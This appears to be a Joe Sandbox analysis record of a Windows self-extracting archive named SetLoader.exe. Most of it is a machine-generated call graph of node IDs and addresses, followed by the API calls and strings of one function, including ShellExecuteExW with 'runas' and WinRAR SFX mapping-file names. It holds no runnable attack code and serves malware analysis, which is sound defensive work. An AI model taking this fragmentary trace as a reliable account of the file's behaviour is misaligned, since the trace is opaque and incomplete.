25155 636dd4 25140->25155 25142 636862 25154 636649 26 API calls _abort 25142->25154 25145 63686d 25147 6310f9 CatchGuardHandler 5 API calls 25145->25147 25149 614bf4 25147->25149 25148 636905 25164 637184 51 API calls 4 library calls 25148->25164 25149->24831 25152 636910 25165 636e57 20 API calls _free 25152->25165 25153->25142 25154->25145 25156 636df1 25155->25156 25157 63688d 25155->25157 25156->25157 25166 63b9a5 GetLastError 25156->25166 25163 636d9f 20 API calls 2 library calls 25157->25163 25159 636e12 25186 63bf86 38 API calls __fassign 25159->25186 25161 636e2b 25187 63bfb3 38 API calls __fassign 25161->25187 25163->25148 25164->25152 25165->25145 25167 63b9c1 25166->25167 25168 63b9bb 25166->25168 25172 63ba10 SetLastError 25167->25172 25189 63d786 25167->25189 25188 63d4ab 11 API calls 2 library calls 25168->25188 25172->25159 25173 63b9db 25196 63bafa 25173->25196 25175 63b9f0 25175->25173 25177 63b9f7 25175->25177 25203 63b810 20 API calls _abort 25177->25203 25178 63b9e1 25179 63ba1c SetLastError 25178->25179 25204 63b584 38 API calls _abort 25179->25204 25181 63ba02 25183 63bafa _free 20 API calls 25181->25183 25185 63ba09 25183->25185 25185->25172 25185->25179 25186->25161 25187->25157 25188->25167 25194 63d793 _abort 25189->25194 25190 63d7d3 25206 63bc7b 20 API calls _abort 25190->25206 25191 63d7be RtlAllocateHeap 25192 63b9d3 25191->25192 25191->25194 25192->25173 25202 63d501 11 API calls 2 library calls 25192->25202 25194->25190 25194->25191 25205 63a2ec 7 API calls 2 library calls 25194->25205 25197 63bb05 RtlFreeHeap 25196->25197 25201 63bb2e __dosmaperr 25196->25201 25198 63bb1a 25197->25198 25197->25201 25207 63bc7b 20 API calls _abort 25198->25207 25200 63bb20 GetLastError 25200->25201 25201->25178 25202->25175 25203->25181 25205->25194 25206->25192 25207->25200 25209 61b123 25208->25209 25210 61b14d 25208->25210 25209->25210 25219 61bc65 25209->25219 25210->24954 25214 61afdc 25213->25214 25215 61affa 25213->25215 25214->25215 25217 
61afe8 FindCloseChangeNotification 25214->25217 25216 61b019 25215->25216 25229 617b49 76 API calls 25215->25229 25216->24954 25217->25215 25220 631590 25219->25220 25221 61bc72 DeleteFileW 25220->25221 25222 61bc91 25221->25222 25223 61bcb9 25221->25223 25224 61da1e 6 API calls 25222->25224 25225 6310f9 CatchGuardHandler 5 API calls 25223->25225 25226 61bca3 25224->25226 25227 61b14b 25225->25227 25226->25223 25228 61bca7 DeleteFileW 25226->25228 25227->24954 25228->25223 25229->25216 25236 61f892 25230->25236 25233 6205c5 SetDlgItemTextW 25233->24966 25234 6205eb LoadStringW 25234->25233 25235 620602 LoadStringW 25234->25235 25235->25233 25243 61f7b8 25236->25243 25239 61f8d3 25241 6310f9 CatchGuardHandler 5 API calls 25239->25241 25242 61f8e8 25241->25242 25242->25233 25242->25234 25244 61f7e1 25243->25244 25252 61f85d _strncpy 25243->25252 25248 61f801 25244->25248 25254 623f47 WideCharToMultiByte 25244->25254 25246 6310f9 CatchGuardHandler 5 API calls 25247 61f88b 25246->25247 25247->25239 25253 61f8ec 26 API calls 25247->25253 25251 61f832 25248->25251 25255 620531 50 API calls __vsnprintf 25248->25255 25256 638a01 26 API calls 3 library calls 25251->25256 25252->25246 25253->25239 25254->25248 25255->25251 25256->25252 25257->24984 25258->24984 25260 61dd22 25259->25260 25261 6310f9 CatchGuardHandler 5 API calls 25260->25261 25262 61dda6 25261->25262 25262->24984 25263->24982 25264->24984 25265->24984 25266->24984 25268 63bb34 25267->25268 25269 63bb41 25268->25269 25270 63bb4c 25268->25270 25283 63bc8e 25269->25283 25272 63bb54 25270->25272 25278 63bb5d _abort 25270->25278 25273 63bafa _free 20 API calls 25272->25273 25276 63bb49 25273->25276 25274 63bb62 25290 63bc7b 20 API calls _abort 25274->25290 25275 63bb87 HeapReAlloc 25275->25276 25275->25278 25276->24984 25278->25274 25278->25275 25291 63a2ec 7 API calls 2 library calls 25278->25291 25280->24991 25281->24984 25282->24974 25284 63bccc 25283->25284 25288 63bc9c _abort 25283->25288 25293 63bc7b 20 API 
calls _abort 25284->25293 25285 63bcb7 RtlAllocateHeap 25287 63bcca 25285->25287 25285->25288 25287->25276 25288->25284 25288->25285 25292 63a2ec 7 API calls 2 library calls 25288->25292 25290->25276 25291->25278 25292->25288 25293->25287 25295 6226ec _wcslen 25294->25295 25327 611925 25295->25327 25297 622704 25297->25000 25299 618deb __EH_prolog3 25298->25299 25340 61ee0f 25299->25340 25301 618e0e 25346 63121c 25301->25346 25303 618e52 _abort 25304 63121c 27 API calls 25303->25304 25305 618e7a 25304->25305 25359 626b0d 25305->25359 25307 618eac 25307->25002 25309 618fff 25308->25309 25310 619080 25309->25310 25393 61c37a 25309->25393 25314 6190e5 25310->25314 25370 6196b9 25310->25370 25312 619127 25313 6310f9 CatchGuardHandler 5 API calls 25312->25313 25316 61914e 25313->25316 25314->25312 25399 611407 74 API calls CatchGuardHandler 25314->25399 25318 618ebb 25316->25318 25866 61ab26 25318->25866 25320 618ee6 25322 618ef7 Concurrency::cancel_current_task 25320->25322 25870 624396 25320->25870 25323 612179 26 API calls 25322->25323 25324 618f1e 25323->25324 25876 61eea4 86 API calls Concurrency::cancel_current_task 25324->25876 25328 611937 25327->25328 25335 61198f 25327->25335 25329 611960 25328->25329 25337 617bad 76 API calls 2 library calls 25328->25337 25331 6366ae 22 API calls 25329->25331 25333 611980 25331->25333 25332 611956 25338 617c32 75 API calls 25332->25338 25333->25335 25339 617c32 75 API calls 25333->25339 25335->25297 25337->25332 25338->25329 25339->25335 25341 61ee1b __EH_prolog3 25340->25341 25342 63121c 27 API calls 25341->25342 25343 61ee59 25342->25343 25344 63121c 27 API calls 25343->25344 25345 61ee7d 25344->25345 25345->25301 25347 631221 ___std_exception_copy 25346->25347 25348 63123b 25347->25348 25350 63123d 25347->25350 25367 63a2ec 7 API calls 2 library calls 25347->25367 25348->25303 25351 614adb Concurrency::cancel_current_task 25350->25351 25353 631247 25350->25353 25365 6347d0 RaiseException 25351->25365 25368 6347d0 
RaiseException 25353->25368 25354 614af7 25356 614b0d 25354->25356 25366 6113db 26 API calls Concurrency::cancel_current_task 25354->25366 25356->25303 25357 631de0 25360 626b19 __EH_prolog3 25359->25360 25361 63121c 27 API calls 25360->25361 25362 626b33 25361->25362 25364 626b4a 25362->25364 25369 622f22 80 API calls 25362->25369 25364->25307 25365->25354 25366->25356 25367->25347 25368->25357 25369->25364 25371 6196d4 25370->25371 25400 61147c 25371->25400 25373 6196fb 25374 61970c 25373->25374 25555 61b982 25373->25555 25378 619743 25374->25378 25410 611b63 25374->25410 25377 61973f 25377->25378 25429 6120a1 144 API calls __EH_prolog3 25377->25429 25559 6116b8 25378->25559 25384 6197e4 25430 61988e 81 API calls 25384->25430 25386 61976b 25386->25384 25392 61c37a 12 API calls 25386->25392 25387 619842 25387->25378 25434 61441e 25387->25434 25446 619906 25387->25446 25388 6197fe 25388->25387 25431 623cf2 25388->25431 25392->25386 25394 61c38f 25393->25394 25395 61c3bd 25394->25395 25853 61c4a8 25394->25853 25395->25309 25398 61c3a4 FindClose 25398->25395 25399->25312 25401 611488 __EH_prolog3 25400->25401 25402 61ee0f 27 API calls 25401->25402 25403 6114b7 25402->25403 25404 63121c 27 API calls 25403->25404 25407 61152b 25403->25407 25406 611518 25404->25406 25406->25407 25567 61668f 25406->25567 25575 61cc45 25407->25575 25409 6115b3 _abort 25409->25373 25411 611b6f __EH_prolog3 25410->25411 25423 611bbc 25411->25423 25426 611cef 25411->25426 25602 61145d 25411->25602 25414 611d21 25614 611407 74 API calls CatchGuardHandler 25414->25614 25416 61441e 118 API calls 25420 611d6c 25416->25420 25417 611d2e 25417->25416 25417->25426 25418 611db4 25422 611de7 25418->25422 25418->25426 25615 611407 74 API calls CatchGuardHandler 25418->25615 25420->25418 25421 61441e 118 API calls 25420->25421 25421->25420 25422->25426 25428 61b8c0 79 API calls 25422->25428 25423->25414 25423->25417 25423->25426 25424 61441e 118 API calls 25425 611e38 25424->25425 25425->25424 
25425->25426 25426->25377 25428->25425 25429->25386 25430->25388 25631 63029f 25431->25631 25435 61442a 25434->25435 25436 61442e 25434->25436 25435->25387 25445 61b8c0 79 API calls 25436->25445 25437 614440 25438 614469 25437->25438 25439 61445b 25437->25439 25641 612fcb 25438->25641 25440 61449b 25439->25440 25687 613ab7 105 API calls 3 library calls 25439->25687 25440->25387 25443 614467 25443->25440 25688 6125f4 74 API calls 25443->25688 25445->25437 25447 619918 25446->25447 25451 61997a 25447->25451 25469 619da2 Concurrency::cancel_current_task 25447->25469 25776 62ab94 119 API calls CatchGuardHandler 25447->25776 25449 61a820 25452 61a825 25449->25452 25453 61a86c 25449->25453 25450 6310f9 CatchGuardHandler 5 API calls 25454 61a862 25450->25454 25451->25449 25457 61999b 25451->25457 25451->25469 25452->25469 25826 618c06 169 API calls 25452->25826 25453->25469 25827 62ab94 119 API calls CatchGuardHandler 25453->25827 25454->25387 25457->25469 25750 616936 25457->25750 25459 619a71 25756 61d63a 25459->25756 25461 619bba 25465 619ce2 25461->25465 25461->25469 25779 619582 38 API calls 25461->25779 25463 619aa4 25463->25461 25777 61bf89 57 API calls 4 library calls 25463->25777 25470 61c37a 12 API calls 25465->25470 25474 619d40 25465->25474 25468 619c24 25778 639ea8 26 API calls 2 library calls 25468->25778 25469->25450 25470->25474 25472 61a0ac 25788 61f014 97 API calls 25472->25788 25760 618f84 25474->25760 25476 619dd1 25495 619e33 25476->25495 25780 614916 27 API calls 2 library calls 25476->25780 25480 61a0c3 25483 61a118 25480->25483 25498 61a0ce 25480->25498 25481 61a004 25481->25480 25487 61a033 25481->25487 25490 61a09b 25483->25490 25790 6193ac 119 API calls CatchGuardHandler 25483->25790 25484 61a7d9 25488 61af2f 80 API calls 25484->25488 25485 61a174 25485->25484 25510 61a1e2 25485->25510 25791 61b288 25485->25791 25486 61a116 25491 61af2f 80 API calls 25486->25491 25487->25485 25487->25490 25492 61bccb 8 API calls 25487->25492 25488->25469 
25490->25485 25490->25486 25491->25469 25493 61a068 25492->25493 25493->25490 25787 61ac09 97 API calls 25493->25787 25494 619f71 25785 61240a 74 API calls CatchGuardHandler 25494->25785 25495->25469 25495->25494 25504 619f78 Concurrency::cancel_current_task 25495->25504 25781 618db7 41 API calls 25495->25781 25782 61f014 97 API calls 25495->25782 25783 61240a 74 API calls CatchGuardHandler 25495->25783 25784 61953f 99 API calls 25495->25784 25498->25486 25789 619155 123 API calls CatchGuardHandler 25498->25789 25501 61a231 25506 61c94d 27 API calls 25501->25506 25504->25481 25786 61bd61 50 API calls 3 library calls 25504->25786 25521 61a247 25506->25521 25508 61a1d0 25795 617e45 77 API calls 25508->25795 25766 61c94d 25510->25766 25511 61a511 25515 61a523 25511->25515 25516 61a537 25511->25516 25536 61a3b5 25511->25536 25512 61a37c 25514 61a43c 25512->25514 25517 61a394 25512->25517 25513 61a31d 25513->25511 25513->25512 25524 61d63a 5 API calls 25514->25524 25808 61ab81 139 API calls __EH_prolog3 25515->25808 25809 6253f0 25516->25809 25519 61a3db 25517->25519 25526 61a3a3 25517->25526 25519->25536 25804 6188a9 113 API calls 25519->25804 25521->25513 25522 61a2f4 25521->25522 25796 61b1e6 25521->25796 25522->25513 25802 61b427 82 API calls 25522->25802 25523 61a550 25821 625099 139 API calls 25523->25821 25530 61a466 25524->25530 25803 61240a 74 API calls CatchGuardHandler 25526->25803 25805 619582 38 API calls 25530->25805 25533 61a502 25533->25387 25535 61a47e 25535->25536 25537 61a494 25535->25537 25538 61a4ab 25535->25538 25536->25533 25541 61a5c5 25536->25541 25822 61c905 5 API calls CatchGuardHandler 25536->25822 25806 6185fc 86 API calls 25537->25806 25807 61a8b9 103 API calls CatchGuardHandler 25538->25807 25543 61a656 25541->25543 25823 61240a 74 API calls CatchGuardHandler 25541->25823 25543->25484 25544 61a764 25543->25544 25546 61a712 25543->25546 25770 61b949 SetEndOfFile 25543->25770 25544->25484 25545 61c2e5 8 API calls 25544->25545 25547 61a7bf 
25545->25547 25771 61b7e2 25546->25771 25547->25484 25824 61240a 74 API calls CatchGuardHandler 25547->25824 25550 61a759 25551 61afd0 77 API calls 25550->25551 25551->25544 25553 61a7cf 25825 617d49 76 API calls CatchGuardHandler 25553->25825 25556 61b999 25555->25556 25557 61b9a3 25556->25557 25850 617c87 78 API calls 25556->25850 25557->25374 25560 6116ca 25559->25560 25562 6116dc Concurrency::cancel_current_task 25559->25562 25560->25562 25851 611729 26 API calls 25560->25851 25563 612179 26 API calls 25562->25563 25564 61170b 25563->25564 25852 61eea4 86 API calls Concurrency::cancel_current_task 25564->25852 25568 61669b __EH_prolog3 25567->25568 25583 61d467 GetCurrentProcess GetProcessAffinityMask 25568->25583 25570 6166a5 25584 6211a5 25570->25584 25572 6166fc 25588 6168b3 GetCurrentProcess GetProcessAffinityMask 25572->25588 25574 616719 25574->25407 25576 61cc65 _abort 25575->25576 25590 61cb21 25576->25590 25581 6310f9 CatchGuardHandler 5 API calls 25582 61cc95 25581->25582 25582->25409 25583->25570 25585 6211b1 __EH_prolog3 25584->25585 25589 614a2c 41 API calls 25585->25589 25587 6211ca 25587->25572 25588->25574 25589->25587 25597 61cb02 25590->25597 25592 61cb96 25593 612179 25592->25593 25594 612193 25593->25594 25595 612184 25593->25595 25594->25581 25601 6113db 26 API calls Concurrency::cancel_current_task 25595->25601 25598 61cb10 25597->25598 25599 61cb0b 25597->25599 25598->25592 25600 612179 26 API calls 25599->25600 25600->25598 25601->25594 25616 6118b2 25602->25616 25605 61b8c0 25606 61b8d2 25605->25606 25607 61b8e5 25605->25607 25608 61b8f0 25606->25608 25629 617cd8 77 API calls 25606->25629 25607->25608 25610 61b8f8 SetFilePointer 25607->25610 25608->25423 25610->25608 25611 61b914 GetLastError 25610->25611 25611->25608 25612 61b91e 25611->25612 25612->25608 25630 617cd8 77 API calls 25612->25630 25614->25426 25615->25422 25617 611476 25616->25617 25618 6118c4 25616->25618 25617->25605 25619 6118ed 25618->25619 25626 617bad 76 API calls 2 
library calls 25618->25626 25620 6366ae 22 API calls 25619->25620 25622 61190a 25620->25622 25622->25617 25628 617c32 75 API calls 25622->25628 25623 6118e3 25627 617c32 75 API calls 25623->25627 25626->25623 25627->25619 25628->25617 25629->25607 25630->25608 25632 6302ac 25631->25632 25633 620597 53 API calls 25632->25633 25634 6302da 25633->25634 25635 614c00 _swprintf 51 API calls 25634->25635 25636 6302ec 25635->25636 25637 62f7fc 21 API calls 25636->25637 25638 6302fd 25637->25638 25639 6310f9 CatchGuardHandler 5 API calls 25638->25639 25640 623d08 25639->25640 25640->25387 25642 612fdd 25641->25642 25653 6130b2 25642->25653 25728 614793 99 API calls 25642->25728 25646 613073 25729 614987 79 API calls 25646->25729 25648 613054 25648->25646 25730 616cbc 97 API calls CatchGuardHandler 25648->25730 25649 6310f9 CatchGuardHandler 5 API calls 25652 613aa9 25649->25652 25650 6130c9 25654 613124 25650->25654 25656 613130 25650->25656 25652->25443 25689 61ed2c 25653->25689 25731 6125f4 74 API calls 25654->25731 25657 61ed2c 78 API calls 25656->25657 25658 61319b 25657->25658 25659 6131d9 25658->25659 25660 6138eb 25658->25660 25665 6131eb 25659->25665 25697 61cbab 25659->25697 25661 61cc45 26 API calls 25660->25661 25661->25665 25663 61307a 25663->25649 25665->25663 25740 61240a 74 API calls CatchGuardHandler 25665->25740 25666 6132c6 25667 613ab1 25666->25667 25668 613586 25666->25668 25741 6313f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 25667->25741 25669 613615 25668->25669 25678 6135a9 _strlen 25668->25678 25733 623d10 MultiByteToWideChar 25669->25733 25672 613ab6 25673 613608 25732 6126b5 7 API calls 25673->25732 25674 613624 25682 613610 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 25674->25682 25734 6125da 25674->25734 25678->25673 25700 622345 25678->25700 25680 613869 25680->25665 25739 61240a 74 API calls CatchGuardHandler 25680->25739 25708 623527 12 API calls 25682->25708 25686 61377a 
25686->25680 25709 6232f8 25686->25709 25719 623583 SystemTimeToFileTime 25686->25719 25738 623527 12 API calls 25686->25738 25687->25443 25688->25440 25690 61eda9 25689->25690 25691 61ed3a 25689->25691 25692 6118b2 78 API calls 25690->25692 25696 6130c3 25690->25696 25693 6118b2 78 API calls 25691->25693 25691->25696 25692->25696 25694 61ed63 25693->25694 25742 616c92 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25694->25742 25696->25646 25696->25650 25698 6125da 78 API calls 25697->25698 25699 61cbbe 25698->25699 25699->25666 25701 622351 __EH_prolog3 25700->25701 25702 6223a1 25701->25702 25703 6125da 78 API calls 25701->25703 25707 622357 25701->25707 25744 623d10 MultiByteToWideChar 25702->25744 25704 622392 25703->25704 25743 62248f OemToCharBuffA _strlen 25704->25743 25707->25673 25708->25686 25710 623322 __aulldiv 25709->25710 25745 61d076 25710->25745 25713 623336 FileTimeToLocalFileTime 25715 6233b3 FileTimeToSystemTime 25713->25715 25714 623348 FileTimeToSystemTime SystemTimeToTzSpecificLocalTime SystemTimeToFileTime SystemTimeToFileTime 25714->25715 25716 62340c __aullrem 25715->25716 25717 6310f9 CatchGuardHandler 5 API calls 25716->25717 25718 62347a 25717->25718 25718->25686 25720 6235f4 25719->25720 25722 62367f 25719->25722 25721 61d076 6 API calls 25720->25721 25723 6235f9 25721->25723 25724 6310f9 CatchGuardHandler 5 API calls 25722->25724 25725 623600 LocalFileTimeToFileTime 25723->25725 25726 62361a FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 25723->25726 25727 6236b8 25724->25727 25725->25722 25726->25722 25727->25686 25728->25648 25729->25663 25730->25653 25731->25663 25732->25682 25733->25674 25735 6125e3 25734->25735 25736 6125ec 25734->25736 25737 6118b2 78 API calls 25735->25737 25736->25682 25737->25736 25738->25686 25739->25665 25740->25663 25741->25672 25742->25696 25743->25702 25744->25707 25746 61d09c GetVersionExW 
25745->25746 25747 61d0c9 25745->25747 25746->25747 25748 6310f9 CatchGuardHandler 5 API calls 25747->25748 25749 61d0f2 25748->25749 25749->25713 25749->25714 25751 616946 25750->25751 25828 616852 25751->25828 25753 616979 25755 6169b1 25753->25755 25833 61d122 6 API calls 3 library calls 25753->25833 25755->25459 25759 61d644 25756->25759 25757 6310f9 CatchGuardHandler 5 API calls 25758 61d7d8 25757->25758 25758->25463 25759->25757 25761 618f99 25760->25761 25762 618fd1 25761->25762 25844 617e25 74 API calls 25761->25844 25762->25469 25762->25472 25762->25476 25764 618fc9 25845 611407 74 API calls CatchGuardHandler 25764->25845 25767 61c95b 25766->25767 25769 61c965 25766->25769 25768 63121c 27 API calls 25767->25768 25768->25769 25769->25501 25770->25546 25772 61b7f3 25771->25772 25775 61b802 25771->25775 25773 61b7f9 FlushFileBuffers 25772->25773 25772->25775 25773->25775 25774 61b87f SetFileTime 25774->25550 25775->25774 25776->25451 25777->25468 25778->25461 25779->25465 25780->25495 25781->25495 25782->25495 25783->25495 25784->25495 25785->25504 25786->25481 25787->25490 25788->25504 25789->25486 25790->25490 25792 61b291 GetFileType 25791->25792 25793 61a1ba 25791->25793 25792->25793 25793->25510 25794 61240a 74 API calls CatchGuardHandler 25793->25794 25794->25508 25795->25510 25797 61b1ff 25796->25797 25800 61b8c0 79 API calls 25797->25800 25798 61b203 25801 61b8c0 79 API calls 25798->25801 25799 61b231 25799->25522 25800->25798 25801->25799 25802->25513 25803->25536 25804->25536 25805->25535 25806->25536 25807->25536 25808->25536 25810 625405 25809->25810 25812 62540f ___std_exception_copy 25809->25812 25846 617c32 75 API calls 25810->25846 25813 625495 25812->25813 25814 62553f 25812->25814 25817 6254b9 _abort 25812->25817 25847 625323 134 API calls 3 library calls 25813->25847 25848 6347d0 RaiseException 25814->25848 25817->25523 25819 62556b 25820 62559d 25819->25820 25849 62517f 134 API calls 25819->25849 25820->25523 25821->25536 25822->25541 
25823->25543 25824->25553 25825->25484 25826->25469 25827->25469 25834 616731 25828->25834 25831 616731 6 API calls 25832 616873 25831->25832 25832->25753 25833->25753 25835 61673b 25834->25835 25836 61d63a 5 API calls 25835->25836 25837 616765 25836->25837 25840 61d63a 5 API calls 25837->25840 25842 616833 25837->25842 25843 61d122 6 API calls 3 library calls 25837->25843 25838 6310f9 CatchGuardHandler 5 API calls 25839 616845 25838->25839 25839->25831 25839->25832 25840->25837 25842->25838 25843->25837 25844->25764 25845->25762 25846->25812 25847->25817 25848->25819 25849->25819 25850->25557 25854 61c4b2 25853->25854 25855 61c4e5 FindFirstFileW 25854->25855 25856 61c548 FindNextFileW 25854->25856 25858 61c4f2 25855->25858 25865 61c52d 25855->25865 25857 61c553 GetLastError 25856->25857 25856->25865 25857->25865 25859 61da1e 6 API calls 25858->25859 25860 61c505 25859->25860 25861 61c522 GetLastError 25860->25861 25862 61c509 FindFirstFileW 25860->25862 25861->25865 25862->25861 25862->25865 25863 6310f9 CatchGuardHandler 5 API calls 25864 61c39f 25863->25864 25864->25395 25864->25398 25865->25863 25867 61ab31 25866->25867 25869 61ab64 _abort 25866->25869 25868 61bc65 8 API calls 25867->25868 25867->25869 25868->25867 25869->25320 25871 6243a0 25870->25871 25872 6243b9 25871->25872 25875 6243cd 25871->25875 25877 622fc9 86 API calls 25872->25877 25874 6243c0 Concurrency::cancel_current_task 25874->25875 25877->25874 25886 62c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25878->25886 25880 62c55d 25882 62c569 25880->25882 25887 62c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25880->25887 25882->25013 25882->25014 25883->25024 25884->25024 25885->25027 25886->25880 25887->25882 25889 61b982 78 API calls 25888->25889 25890 6120f7 25889->25890 25891 612114 25890->25891 25892 611b63 118 API calls 25890->25892 25891->25043 25891->25044 25893 612104 25892->25893 25893->25891 25899 611407 74 API calls CatchGuardHandler 25893->25899 25896 611b1a 25895->25896 25897 
611b1e 25895->25897 25896->25049 25900 611a55 25897->25900 25899->25891 25901 611a67 25900->25901 25902 611aa4 25900->25902 25903 61441e 118 API calls 25901->25903 25908 6148bd 25902->25908 25904 611a87 25903->25904 25904->25896 25912 6148c6 25908->25912 25909 61441e 118 API calls 25909->25912 25910 611ac5 25910->25904 25913 611fb0 25910->25913 25912->25909 25912->25910 25925 622ee4 25912->25925 25914 611fbc __EH_prolog3 25913->25914 25933 6144ab 25914->25933 25917 6118b2 78 API calls 25918 611ff0 25917->25918 25965 61199b 78 API calls 25918->25965 25920 612060 25920->25904 25921 612008 25923 612014 _wcslen 25921->25923 25966 623d10 MultiByteToWideChar 25921->25966 25967 61199b 78 API calls 25923->25967 25926 622eeb 25925->25926 25927 622f06 25926->25927 25931 617ba8 RaiseException Concurrency::cancel_current_task 25926->25931 25929 622f17 SetThreadExecutionState 25927->25929 25932 617ba8 RaiseException Concurrency::cancel_current_task 25927->25932 25929->25912 25931->25927 25932->25929 25934 6144c6 25933->25934 25935 614510 25934->25935 25936 6144f4 25934->25936 25937 61476a 25935->25937 25942 61453c 25935->25942 25968 611407 74 API calls CatchGuardHandler 25936->25968 25975 611407 74 API calls CatchGuardHandler 25937->25975 25940 6144ff 25941 6310f9 CatchGuardHandler 5 API calls 25940->25941 25943 611fdf 25941->25943 25942->25940 25944 6253f0 134 API calls 25942->25944 25943->25917 25943->25920 25950 614589 25944->25950 25945 6145bb 25946 614646 25945->25946 25964 6145b2 25945->25964 25970 61f014 97 API calls 25945->25970 25948 61c94d 27 API calls 25946->25948 25947 6145b7 25947->25945 25952 6125da 78 API calls 25947->25952 25954 614659 25948->25954 25949 6145a7 25969 611407 74 API calls CatchGuardHandler 25949->25969 25950->25945 25950->25947 25950->25949 25951 624396 86 API calls 25951->25940 25952->25945 25956 6146f2 25954->25956 25957 6146e2 25954->25957 25972 625099 139 API calls 25956->25972 25971 61ab81 139 API calls __EH_prolog3 25957->25971 25960 6146f0 
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062DC06
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062DC24
                                              • IsDialogMessageW.USER32(?,?), ref: 0062DC37
                                              • TranslateMessage.USER32(?), ref: 0062DC45
                                              • DispatchMessageW.USER32(?), ref: 0062DC4F
                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0062DC72
                                              • GetDlgItem.USER32(?,00000068), ref: 0062DCB8
                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0062DCD3
                                              • SendMessageW.USER32(00000000,000000C2,00000000,006465F4), ref: 0062DCE6
                                                • Part of subcall function 0062F77B: _wcslen.LIBCMT ref: 0062F7A5
                                              • SetFocus.USER32(00000000), ref: 0062DCED
                                              • _swprintf.LIBCMT ref: 0062DD4C
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0062DDAF
                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0062DDD7
                                              • GetTickCount.KERNEL32 ref: 0062DDF5
                                              • _swprintf.LIBCMT ref: 0062DE0D
                                              • GetLastError.KERNEL32(?,00000011), ref: 0062DE3F
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 0062DE92
                                              • _swprintf.LIBCMT ref: 0062DEC9
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00663482,00000200), ref: 0062DF1D
                                              • GetCommandLineW.KERNEL32(?,?,?,?,00663482,00000200), ref: 0062DF33
                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00663482,00000400,00000001,00000001,?,?,?,?,00663482,00000200), ref: 0062DF8A
                                              • ShellExecuteExW.SHELL32(?), ref: 0062DFB2
                                              • WaitForInputIdle.USER32(?,00002710), ref: 0062DFE6
                                              • Sleep.KERNEL32(00000064,?,?,?,?,00663482,00000200), ref: 0062DFFA
                                              • UnmapViewOfFile.KERNEL32(?,?,0000421C,00663482,00000400,?,?,?,?,00663482,00000200), ref: 0062E023
                                              • CloseHandle.KERNEL32(?,?,?,?,?,00663482,00000200), ref: 0062E02C
                                              • _swprintf.LIBCMT ref: 0062E05F
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062E0BE
                                              • SetDlgItemTextW.USER32(?,00000065,006465F4), ref: 0062E0D5
                                              • GetDlgItem.USER32(?,00000065), ref: 0062E0DE
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0062E0ED
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0062E0FC
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062E1A9
                                              • _wcslen.LIBCMT ref: 0062E1FF
                                              • _swprintf.LIBCMT ref: 0062E229
                                              • SendMessageW.USER32(?,00000080,00000001,004F01B1), ref: 0062E273
                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0062E28D
                                              • GetDlgItem.USER32(?,00000068), ref: 0062E296
                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0062E2AC
                                              • GetDlgItem.USER32(?,00000066), ref: 0062E2C6
                                              • SetWindowTextW.USER32(00000000,0066589A), ref: 0062E2E8
                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0062E348
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062E35B
                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 0062E3FE
                                              • EnableWindow.USER32(00000000,00000000), ref: 0062E4CC
                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0062E50E
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062E532
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWait__vswprintf_c_l
                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$C:\Users\user\Desktop\SetLoader.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$runas$winrarsfxmappingfile.tmp
                                              • API String ID: 3499002864-3316464774
